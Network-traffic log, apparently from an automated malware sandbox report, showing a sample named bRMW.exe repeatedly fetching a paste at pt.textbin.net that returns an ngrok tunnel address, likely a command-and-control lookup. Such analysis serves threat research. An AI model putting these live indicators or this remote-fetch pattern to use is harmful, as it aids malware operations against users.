                                                                                                2023-11-23 00:09:01 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:01 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549710148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:04 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:05 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:05 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549712148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:09 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:09:09 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:09 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549722148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:13 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:09:13 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:13 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549724148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:16 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:17 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:17 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.549726148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:20 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:20 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:20 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.549728148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:24 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:09:24 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:24 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.549730148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:28 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:28 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:28 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.549732148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:31 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:32 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:32 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.549734148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:35 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:35 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 33 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:35 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.549736148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:39 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:39 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:39 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.549738148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:43 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:43 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:43 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.549740148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:47 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:09:47 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:47 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.549744148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:51 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
